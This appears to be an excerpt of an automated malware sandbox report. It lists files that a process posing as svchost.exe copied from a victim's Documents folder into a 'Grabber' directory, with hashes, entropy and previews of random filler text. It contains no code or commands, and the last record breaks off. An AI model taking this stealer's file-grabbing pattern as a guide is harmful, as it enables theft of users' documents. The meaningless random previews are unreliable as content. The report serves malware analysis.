                                                  Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EEGWXUHVUG\NVWZAPQSQL.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA\EFOYFBOLXA.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA\GIGIYTFFYT.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.7020597455120665
                                                  Encrypted:false
                                                  SSDEEP:24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
                                                  MD5:47F4925C44B6916FE1BEE7FBB1ACF777
                                                  SHA1:D7BFAEF09A15A105540FC44D2C307778C0553CE5
                                                  SHA-256:62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
                                                  SHA-512:6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
                                                  Malicious:false
                                                  Preview:GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA\JDDHMPCDUJ.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.687055908915499
                                                  Encrypted:false
                                                  SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                  MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                  SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                  SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                  SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                  Malicious:false
                                                  Preview:JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA\PALRGUCVEH.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA\ZGGKNSUKOP.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6959554225029665
                                                  Encrypted:false
                                                  SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                  MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                  SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                  SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                  SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                  Malicious:false
                                                  Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EIVQSAOTAQ.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692024230831571
                                                  Encrypted:false
                                                  SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                  MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                  SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                  SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                  SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                  Malicious:false
                                                  Preview:EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EOWRVPQCCS.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692990330209164
                                                  Encrypted:false
                                                  SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                  MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                  SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
